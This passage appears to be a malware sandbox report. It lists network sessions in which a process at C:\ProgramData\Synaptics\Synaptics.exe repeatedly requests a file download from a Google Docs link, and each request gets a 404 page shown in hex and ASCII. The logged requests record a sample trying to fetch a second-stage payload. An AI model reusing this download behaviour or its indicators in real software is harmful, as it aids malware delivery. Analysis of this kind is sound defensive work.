                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:48 UTC415INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:48 UTC415INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 4c 41 44 6d 54 2f 48 35 4f 43 6c 71 75 66 6f 5a 42 46 79 58 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iLADmT/H5OClqufoZBFyXg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:48 UTC416INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:48 UTC417INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        136192.168.2.349899142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:48 UTC414OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:48 UTC417INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:48 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-i+gMozs/M4RMt5MOLLHDAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:48 UTC418INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:48 UTC418INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 64 31 61 53 4e 52 4a 38 7a 65 72 54 30 54 47 6e 6a 61 2b 4c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Bd1aSNRJ8zerT0TGnja+Lg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:48 UTC419INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:48 UTC420INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        137192.168.2.349900142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:48 UTC417OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:48 UTC420INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:48 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-RXftXdJr0dRFPdbjfgYH8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:48 UTC421INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 55 4c 4a 34 6e 59 64 4c 6e 69 72 51 30 71 33 6b 78 49 31 6a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0ULJ4nYdLnirQ0q3kxI1jA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:48 UTC423INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:48 UTC423INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        138192.168.2.349901142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:48 UTC420OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:48 UTC423INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:48 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Rx/Vb0d09CMTY3XGV7cmHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:48 UTC424INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2f 4c 33 2b 64 44 67 75 39 37 49 75 49 46 56 4d 6c 2f 4c 70 43 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="/L3+dDgu97IuIFVMl/LpCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:48 UTC426INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:48 UTC426INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        139192.168.2.349902142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:48 UTC423OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:48 UTC426INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:48 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-yH/yM9guq+Yj14iv7/jAxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:48 UTC428INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 71 69 64 47 54 76 58 34 65 77 6f 71 71 54 54 47 70 41 69 32 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qqidGTvX4ewoqqTTGpAi2A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:48 UTC429INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:48 UTC429INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        14192.168.2.349749142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:30 UTC40OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:31 UTC44INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:30 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-YD+64BYnDAy5YoAelAiMTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
